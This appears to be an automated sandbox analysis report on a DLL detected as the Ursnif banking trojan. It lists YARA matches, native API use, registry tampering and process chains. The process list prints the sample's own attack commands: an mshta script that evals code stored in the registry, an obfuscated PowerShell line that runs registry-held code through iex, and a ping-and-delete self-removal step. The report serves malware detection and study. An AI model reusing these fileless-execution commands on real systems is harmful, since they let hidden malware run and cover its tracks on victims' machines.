                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A15FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04A15FBB

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: lokvQRcUe0.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A1829C2_2_04A1829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A116452_2_04A11645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A14BF12_2_04A14BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F83DB02_2_04F83DB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7154D2_2_04F7154D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7D7F12_2_04F7D7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F667CA2_2_04F667CA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7FF4D2_2_04F7FF4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6B2382_2_04F6B238
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DAB4B834_2_00DAB4B8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DAEEF834_2_00DAEEF8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA966034_2_00DA9660
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC98A834_2_00DC98A8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC80A834_2_00DC80A8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC785034_2_00DC7850
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB186434_2_00DB1864
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB283034_2_00DB2830
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DBB9E034_2_00DBB9E0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC51A834_2_00DC51A8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA716C34_2_00DA716C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA511034_2_00DA5110
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA410C34_2_00DA410C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DBE12034_2_00DBE120
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC2AD834_2_00DC2AD8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC8AC034_2_00DC8AC0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB124834_2_00DB1248
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB424034_2_00DB4240
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DCC22034_2_00DCC220
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC73EC34_2_00DC73EC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA34D834_2_00DA34D8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DCD4D434_2_00DCD4D4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC34C034_2_00DC34C0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB6CA434_2_00DB6CA4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DCAC5034_2_00DCAC50
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DBC46C34_2_00DBC46C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DAD40434_2_00DAD404
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA3C3C34_2_00DA3C3C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC242834_2_00DC2428
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC7DB434_2_00DC7DB4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA9D1C34_2_00DA9D1C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DBCD1C34_2_00DBCD1C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC053034_2_00DC0530
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DBBED034_2_00DBBED0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB2EE834_2_00DB2EE8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC568434_2_00DC5684
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA1EA834_2_00DA1EA8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC1E5C34_2_00DC1E5C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB867034_2_00DB8670
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC163834_2_00DC1638
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB4F5C34_2_00DB4F5C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB6F7834_2_00DB6F78
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC772C34_2_00DC772C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA572C34_2_00DA572C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F78E57 CreateProcessAsUserW,2_2_04F78E57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A14321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_04A14321
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A16D0A NtMapViewOfSection,2_2_04A16D0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A1190C GetProcAddress,NtCreateSection,memset,2_2_04A1190C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A184C1 NtQueryVirtualMemory,2_2_04A184C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F674AE NtQueryInformationProcess,2_2_04F674AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_04F6C431
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F76DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_04F76DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7BE80 NtMapViewOfSection,2_2_04F7BE80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F70782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_04F70782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F700DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_04F700DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_04F7A806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F761AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_04F761AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F77950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_04F77950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6710A GetProcAddress,NtCreateSection,memset,2_2_04F6710A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F72331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_04F72331
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F75312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_04F75312
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F664C4 memset,NtQueryInformationProcess,2_2_04F664C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F636BB NtGetContextThread,RtlNtStatusToDosError,2_2_04F636BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_04F6B7D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_04F6D77A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F610C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_04F610C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F73829 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_04F73829
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F7EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_04F7EAC5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F75220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_04F75220
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA40C0 NtReadVirtualMemory,34_2_00DA40C0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB583C NtCreateSection,34_2_00DB583C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DB41D8 NtMapViewOfSection,34_2_00DB41D8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DCA148 NtQueryInformationProcess,34_2_00DCA148
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DAAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,34_2_00DAAA6C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DC04CC NtAllocateVirtualMemory,34_2_00DC04CC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose,34_2_00DA65E4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA6D24 NtWriteVirtualMemory,34_2_00DA6D24
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DA9660 NtSetContextThread,NtUnmapViewOfSection,NtClose,34_2_00DA9660
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DDF00C NtProtectVirtualMemory,NtProtectVirtualMemory,34_2_00DDF00C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00DDF36C NtProtectVirtualMemory,34_2_00DDF36C
                      Source: lokvQRcUe0.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs lokvQRcUe0.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: lokvQRcUe0.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lokvQRcUe0.dllReversingLabs: Detection: 48%
                      Source: lokvQRcUe0.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220526Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC52.tmpJump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@27/28@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A168BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_04A168BD
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{98D9F3EF-1790-8A6E-614C-3B5E25409F72}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{A88D448E-E714-1A0D-B15C-0BEE75506F02}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5034037C-6F7B-0272-7984-1356BDF8F7EA}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.249261559.000000000040D000.00000002.00000001.01000000.00000003.sdmp, lokvQRcUe0.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.403089755.00000000063E0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.396843760.0000000006330000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A17EA0 push ecx; ret 2_2_04A17EA9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A1828B push ecx; ret 2_2_04A1829B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F63495 push ecx; mov dword ptr [esp], 00000002h2_2_04F63496
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F83D9F push ecx; ret 2_2_04F83DAF
